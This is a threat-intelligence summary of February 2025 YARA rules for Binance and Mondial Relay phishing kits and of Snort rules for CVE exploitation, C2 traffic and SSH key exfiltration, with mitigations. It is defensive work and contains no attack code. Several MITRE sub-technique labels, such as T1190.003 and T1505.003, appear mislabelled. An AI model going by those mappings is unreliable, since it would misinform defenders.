Full Report
The following is the information on Yara and Snort rules (week 2, February 2025) collected and shared by the AhnLab TIP service. 2 YARA Rules Detection name Description Source PK_Binance_nuxt Phishing Kit impersonating Binance https://github.com/t4d/PhishingKit-Yara-Rules PK_MondialRelay_traffyque Phishing Kit impersonating Mondial Relay https://github.com/t4d/PhishingKit-Yara-Rules 20 Snort Rules Detection name Source ET POLICY Contec Health CMS8000 Patient Monitor […]
Analysis Summary
# Tool/Technique: PK_Binance_nuxt Phishing Kit
## Overview
A YARA rule designed to detect a specific phishing kit designed to impersonate the Binance crypto exchange.
## Technical Details
- Type: Malware Family/Impersonation Kit (Phishing Kit)
- Platform: General Web Servers (Scripts used for phishing pages)
- Capabilities: Impersonating the Binance login interface for credential harvesting.
- First Seen: Derived from the context of the February 2025 updates.
## MITRE ATT&CK Mapping
*Note: Since this is a phishing kit, the primary focus is credential access, though specific TTPs depend on the underlying kit implementation.*
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (If delivered via email)
- T1566.002 - Spearphishing Link (If a link directs to the phishing site)
## Functionality
### Core Capabilities
- **Impersonation:** Creates a webpage mimicking the legitimate Binance interface.
- **Credential Harvesting:** Captures usernames and passwords entered by victims.
### Advanced Features
- The specific advanced features of this kit are not detailed, but phishing kits generally focus on low-level web coding to bypass simple defenses and effectively steal data.
## Indicators of Compromise
- File Hashes: N/A (The article lists the detection name, not file hashes for the kit itself)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Network traffic patterns associated with submitting credentials to an attacker-controlled server hosting this kit.
## Associated Threat Actors
- Unknown actors leveraging off-the-shelf or custom phishing kits targeting cryptocurrency users.
## Detection Methods
- Signature-based detection: Detection relies on the presence of the signatures matched by the YARA rule `PK_Binance_nuxt`.
- Behavioral detection: Monitoring for web pages attempting to replicate known financial service login portals.
- YARA rules: `PK_Binance_nuxt` (Source: [https://github.com/t4d/PhishingKit-Yara-Rules](https://github.com/t4d/PhishingKit-Yara-Rules))
## Mitigation Strategies
- **Prevention:** User training regarding phishing attempts, especially those targeting cryptocurrency accounts. Implementing Multi-Factor Authentication (MFA) on sensitive accounts.
- **Hardening:** DNS filtering or web content filtering to block access to recently registered deceptive domains.
## Related Tools/Techniques
- PK\_MondialRelay\_traffyque (Another phishing kit detected in the same report)
***
# Tool/Technique: PK_MondialRelay_traffyque Phishing Kit
## Overview
A YARA rule designed to detect a specific phishing kit used to impersonate Mondial Relay (a package delivery service).
## Technical Details
- Type: Malware Family/Impersonation Kit (Phishing Kit)
- Platform: General Web Servers (Scripts used for phishing pages)
- Capabilities: Impersonating the Mondial Relay interface, likely for obtaining personal information or delivery details.
- First Seen: Derived from the context of the February 2025 updates.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Spearphishing Link
## Functionality
### Core Capabilities
- **Impersonation:** Creates a webpage mimicking the Mondial Relay interface.
- **Data Capture:** Captures personal or logistical data entered by victims.
### Advanced Features
- Unknown, but likely focused on mobile-friendly interface replication for package tracking scams.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Traffic characteristic of package delivery scams seeking user inputs.
## Associated Threat Actors
- Unknown actors leveraging phishing kits targeting logistics customers.
## Detection Methods
- Signature-based detection: Detection relies on the presence of the signatures matched by the YARA rule `PK_MondialRelay_traffyque`.
- Behavioral detection: Monitoring for web infrastructure hosting familiar delivery service layouts.
- YARA rules: `PK_MondialRelay_traffyque` (Source: [https://github.com/t4d/PhishingKit-Yara-Rules](https://github.com/t4d/PhishingKit-Yara-Rules))
## Mitigation Strategies
- **Prevention:** Educating users on package delivery scams attempting to lure victims into paying customs fees or verifying information.
- **Hardening:** Implementing strong email filtering to block links to suspicious login domains.
## Related Tools/Techniques
- PK\_Binance\_nuxt (Another phishing kit detected in the same report)
***
# Tool/Technique: Vulnerabilities Exploited via Snort Rules (February 2025)
## Overview
A compilation of network-based alerts generated by 20 Snort rules published by Emerging Threats, targeting specific known vulnerabilities (CVEs) impacting medical equipment, enterprise software, and network devices.
## Technical Details
- Type: Vulnerabilities/Exploitation Attempts (Detected via Network Signatures)
- Platform: Mixed (Healthcare, Enterprise Software, Network Appliances)
- Capabilities: Signatures cover exploitation attempts related to default credentials, Command Injection (CI), XML External Entity (XXE) injection, Path Traversal, and known backdoors.
- First Seen: Contextual to the February 2025 rule release.
## MITRE ATT&CK Mapping
Multiple techniques are covered via the various CVEs detected:
- T1190 - Exploit Public-Facing Application
- T1190.003 - Exploit Database Configuration
- T1059 - Command and Scripting Interpreter
- T1059.004 - Command Injection (Relevant for CI CVEs)
- T1505 - Server Software Component Vulnerability
- T1505.003 - Exploitation of XML External Entity (Relevant for XXE CVEs)
## Functionality
### Core Capabilities (Based on Detected Exploits)
- **Command Injection:** Exploiting interfaces in FXC Routers (CVE-2023-49897) and QNAP servers (CVE-2023-47565).
- **XXE Injection:** Targeting vulnerabilities in Ivanti EPM (CVE-2024-37397, CVE-2024-38653), HPE Insights (CVE-2024-53675), and YETI Platform (CVE-2024-45607).
- **Authentication Bypass/Backdoors:** Detecting attempts against D-Link (CVE-2021-40655) and specific Ivanti backdoor activity (CVE-2021-44529).
- **Insecure Protocols:** Detecting traffic related to insecure default HL7 configurations on Contec Health Patient Monitors (CVE-2025-0626).
### Advanced Features
- Detection of specific malware command-and-control (CnC) traffic patterns related to **Onestart AI** and **Winos4.0 Framework**.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific traffic patterns indicating command payloads (e.g., SSH key exfiltration over HTTP, CnC checkins)
- Behavioral Indicators: Network activity matching the pattern of recognized exploitation attempts against the listed software versions.
## Associated Threat Actors
- Generic opportunistic attackers exploiting known CVEs.
- Specific threat actors may be associated with Onestart AI or Winos4.0 activity, though not explicitly named.
## Detection Methods
- Signature-based detection: Relying on the 20 specific Snort rules provided by Emerging Threats.
- Behavioral detection: Network monitoring detecting protocol anomalies or exploit signatures targeting the vulnerable software.
- YARA rules: N/A (This section focuses on Snort/Network rules)
## Mitigation Strategies
- **Prevention:** Immediate patching of all systems identified as potentially vulnerable to the listed CVEs (Contec Health, YETI, SimpleHelp, Ivanti, QNAP, HPE, DrayTek, D-Link).
- **Hardening:** Disabling unnecessary services (especially HL7 monitoring if not required); implementing egress filtering to prevent SSH keys from leaving over HTTP; segmenting critical infrastructure (like medical devices).
## Related Tools/Techniques
- Specific exploitation payloads related to XXE attacks.
- Detection of proprietary malware C2 signatures (Onestart AI, Winos4.0).